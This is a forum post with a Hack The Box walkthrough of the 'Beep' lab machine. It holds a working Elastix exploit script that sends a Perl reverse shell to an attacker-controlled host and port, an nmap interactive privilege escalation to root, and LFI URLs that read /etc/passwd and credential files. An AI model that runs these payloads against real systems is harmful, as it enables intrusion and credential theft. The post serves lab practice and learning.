Jump to content

Title: Hack the box - Beep

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

Hack The Box - Beep

20210321190442.png-water_print

信息收集

1

nmap -T4 -A 10.10.10.7

20210321190949.png-water_print

Port 80 is Elastix application:

20210321190726.png-water_print

Use searchploit to find historical vulnerabilities:

20210321191148.png-water_print

漏洞利用

漏洞点一

Found an LFI vulnerability, try to exploit it, and find sensitive information:

20210321191559.png-water_print

Discover username and password: admin:jEhdIekWmdjE.

Use this key to try logging in and enter the background:

20210321191816.png-water_print

Use this key to try to log in to SSH:

20210321194651.png-water_print

If you find the problem of key reuse, just getshell.

漏洞点二

A RCE vulnerability was found in the historical vulnerability library: https://www.exploit-db.com/exploits/18650

Modify payload, including rhost, lhost, lport, extension

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

import urllib

import ssl

rhost='10.10.10.7'

lhost='10.10.14.7'

lport=4444

extension='233'

ctx=ssl.create_default_context()

ctx.check_hostname=False

ctx.verify_mode=ssl.CERT_NONE

# Reverse shell payload

url='https://'+str(rhost)+'/recordings/misc/callme_page.php?action=ccallmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%2 9%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url, context=ctx)

# On Elastix, once we have a shell, we can escalate to root:

# root@bt:~# nc -lvp 443

# listening on [any] 443 .

# connect to [172.16.254.223] from voip [172.16.254.72] 43415

#id

# uid=100(asterisk) gid=101(asterisk)

# sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/)

# Welcome to Interactive Mode -- press h enter for help

# nmap !sh

#id

# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

SIP extensionYou can confirm in the login management background

20210321195811.png-water_print

漏洞点三

When scanning the directory, the vtigercrm directory was found, looking for historical vulnerabilities, and LFI exists:

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=./././././././././etc/passwd%00

20210321201652.png-water_print

You can also include /etc/amportal.conf to obtain password information.

In addition, there are also vulnerabilities in vtigercrm on MSF:

20210321202356.png-water_print

Use 1 failed, use 2 succeeded.

20210321202510.png-water_print

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.